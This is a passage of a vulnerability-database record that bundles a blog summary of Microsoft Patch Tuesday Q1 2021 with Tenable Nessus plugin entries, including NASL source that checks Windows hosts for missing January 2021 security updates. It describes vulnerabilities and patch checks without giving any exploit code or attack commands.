MSTIC here](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). The attacks included three steps. First, it would gain access to an Exchange Server either with stolen passwords or by using the previously undiscovered vulnerabilities to disguise itself as someone who should have access. Second, it would create what\u2019s called a web shell to control the compromised server remotely. Third, it would use that remote access \u2013 run from the U.S.-based private servers \u2013 to steal data from an organization\u2019s network."\n\nIn short, these Exchange vulnerabilities are the top.\n\nThe rest are Chrome vulnerabilities, simply because Microsoft's browser is now based on Chrome.\n\nYou can download full versions of reports here:\n\n * [ms_patch_tuesday_january2021](<http://avleonov.com/vulristics_reports/ms_patch_tuesday_january2021_report_avleonov_comments.html>)\n * [ms_patch_tuesday_february2021](<http://avleonov.com/vulristics_reports/ms_patch_tuesday_february2021_report_avleonov_comments.html>)\n * [ms_patch_tuesday_march2021](<http://avleonov.com/vulristics_reports/ms_patch_tuesday_march2021_report_avleonov_comments.html>)\n * [ms_patch_tuesday_other_Q1_2021](<http://avleonov.com/vulristics_reports/ms_patch_tuesday_other_Q1_2021_report_avleonov_comments.html>)\n![](http://feeds.feedburner.com/~r/avleonov/~4/poQoyaBweKg)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-03-26T02:47:52", "type": "avleonov", "title": "Vulristics: Microsoft Patch Tuesdays Q1 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986", "CVE-2020-1350", "CVE-2021-1647", "CVE-2021-1648", "CVE-2021-1658", "CVE-2021-1660", "CVE-2021-1664", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1669", "CVE-2021-1671", "CVE-2021-1673", "CVE-2021-1698", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1730", "CVE-2021-1732", "CVE-2021-24074", "CVE-2021-24078", "CVE-2021-24085", "CVE-2021-24086", "CVE-2021-24094", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26891", "CVE-2021-27065"], "modified": "2021-03-26T02:47:52", "id": "AVLEONOV:13BED8E5AD26449401A37E1273217B9A", "href": "http://feedproxy.google.com/~r/avleonov/~3/poQoyaBweKg/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-11T14:40:30", "description": "The remote Windows host is missing security update 4598297 or cumulative update 4598278. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2020-17087, CVE-2021-1648, CVE-2021-1649, CVE-2021-1650, CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1661, CVE-2021-1688, CVE-2021-1693, CVE-2021-1694, CVE-2021-1695, CVE-2021-1702, CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-1679)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. (CVE-2021-1674, CVE-2021-1678)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-1656, CVE-2021-1676, CVE-2021-1696, CVE-2021-1699, CVE-2021-1708)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-1657, CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1665, CVE-2021-1666, CVE-2021-1667, CVE-2021-1668, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701, CVE-2021-1710)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "nessus", "title": "KB4598297: Windows Server 2012 January 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17087", "CVE-2021-1648", "CVE-2021-1649", "CVE-2021-1650", "CVE-2021-1652", "CVE-2021-1653", "CVE-2021-1654", "CVE-2021-1655", "CVE-2021-1656", "CVE-2021-1657", "CVE-2021-1658", "CVE-2021-1659", "CVE-2021-1660", "CVE-2021-1661", "CVE-2021-1664", "CVE-2021-1665", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1668", "CVE-2021-1671", "CVE-2021-1673", "CVE-2021-1674", "CVE-2021-1676", "CVE-2021-1678", "CVE-2021-1679", "CVE-2021-1688", "CVE-2021-1693", "CVE-2021-1694", "CVE-2021-1695", "CVE-2021-1696", "CVE-2021-1699", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1702", "CVE-2021-1704", "CVE-2021-1706", "CVE-2021-1708", "CVE-2021-1709", "CVE-2021-1710"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598278.NASL", "href": "https://www.tenable.com/plugins/nessus/144881", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144881);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2020-17087\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1671\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1688\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"MSKB\", value:\"4598278\");\n script_xref(name:\"MSKB\", value:\"4598297\");\n script_xref(name:\"MSFT\", value:\"MS21-4598278\");\n script_xref(name:\"MSFT\", value:\"MS21-4598297\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0001\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0135\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"KB4598297: Windows Server 2012 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4598297\nor cumulative update 4598278. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2020-17087, CVE-2021-1648, CVE-2021-1649, \n CVE-2021-1650, CVE-2021-1652, CVE-2021-1653, \n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, \n CVE-2021-1661, CVE-2021-1688, CVE-2021-1693, \n CVE-2021-1694, CVE-2021-1695, CVE-2021-1702, \n CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1674,\n CVE-2021-1678)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1656, CVE-2021-1676,\n CVE-2021-1696, CVE-2021-1699, CVE-2021-1708)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701, CVE-2021-1710)\");\n # https://support.microsoft.com/en-us/help/4598278/windows-server-2012-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bbb76f59\");\n # https://support.microsoft.com/en-us/help/4598297/windows-server-2012-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b71d9485\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4598297 or Cumulative Update KB4598278.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-1694\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS21-01\";\nkbs = make_list('4598278', '4598297'); # changed by manual execution of PT scriptsautomation\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"01_2021\",\n bulletin:bulletin,\n rollup_kb_list:[4598297, 4598278])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:38:14", "description": "The remote Windows host is missing security update 4598275 or cumulative update 4598285. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-1637, CVE-2021-1656, CVE-2021-1676, CVE-2021-1696, CVE-2021-1699, CVE-2021-1708)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1648, CVE-2021-1649, CVE-2021-1650, CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1661, CVE-2021-1688, CVE-2021-1693, CVE-2021-1694, CVE-2021-1695, CVE-2021-1702, CVE-2021-1704, CVE-2021-1706, CVE-2021-1709)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. (CVE-2021-1674, CVE-2021-1678, CVE-2021-1683, CVE-2021-1684)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-1679, CVE-2021-1692)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-1657, CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1665, CVE-2021-1666, CVE-2021-1667, CVE-2021-1668, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701, CVE-2021-1710)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "nessus", "title": "KB4598275: Windows 8.1 and Windows Server 2012 R2 January 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1637", "CVE-2021-1648", "CVE-2021-1649", "CVE-2021-1650", "CVE-2021-1652", "CVE-2021-1653", "CVE-2021-1654", "CVE-2021-1655", "CVE-2021-1656", "CVE-2021-1657", "CVE-2021-1658", "CVE-2021-1659", "CVE-2021-1660", "CVE-2021-1661", "CVE-2021-1664", "CVE-2021-1665", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1668", "CVE-2021-1671", "CVE-2021-1673", "CVE-2021-1674", "CVE-2021-1676", "CVE-2021-1678", "CVE-2021-1679", "CVE-2021-1683", "CVE-2021-1684", "CVE-2021-1688", "CVE-2021-1692", "CVE-2021-1693", "CVE-2021-1694", "CVE-2021-1695", "CVE-2021-1696", "CVE-2021-1699", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1702", "CVE-2021-1704", "CVE-2021-1706", "CVE-2021-1708", "CVE-2021-1709", "CVE-2021-1710"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598275.NASL", "href": "https://www.tenable.com/plugins/nessus/144888", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144888);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2021-1637\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1671\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1683\",\n \"CVE-2021-1684\",\n \"CVE-2021-1688\",\n \"CVE-2021-1692\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"MSKB\", value:\"4598285\");\n script_xref(name:\"MSKB\", value:\"4598275\");\n script_xref(name:\"MSFT\", value:\"MS21-4598285\");\n script_xref(name:\"MSFT\", value:\"MS21-4598275\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0001\");\n\n script_name(english:\"KB4598275: Windows 8.1 and Windows Server 2012 R2 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4598275\nor cumulative update 4598285. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1637, CVE-2021-1656,\n CVE-2021-1676, CVE-2021-1696, CVE-2021-1699,\n CVE-2021-1708)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1648, CVE-2021-1649, CVE-2021-1650,\n CVE-2021-1652, CVE-2021-1653, CVE-2021-1654,\n CVE-2021-1655, CVE-2021-1659, CVE-2021-1661,\n CVE-2021-1688, CVE-2021-1693, CVE-2021-1694,\n CVE-2021-1695, CVE-2021-1702, CVE-2021-1704,\n CVE-2021-1706, CVE-2021-1709)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1674,\n CVE-2021-1678, CVE-2021-1683, CVE-2021-1684)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-1679,\n CVE-2021-1692)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1657,\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664,\n CVE-2021-1665, CVE-2021-1666, CVE-2021-1667,\n CVE-2021-1668, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700, CVE-2021-1701, CVE-2021-1710)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4598285/windows-8-1-update\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4598275/windows-8-1-update\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4598275 or Cumulative Update KB4598285.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-1694\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598275',\n '4598285'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3', \n sp:0,\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598275, 4598285])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-04T14:37:24", "description": "The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1685. (CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1680. (CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Windows Event Tracing Elevation of Privilege Vulnerability (CVE-2021-1662)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1671)\n\n - Windows Projected File System FS Filter Driver Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-1663, CVE-2021-1670. (CVE-2021-1672)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686, CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Kernel Elevation of Privilege Vulnerability 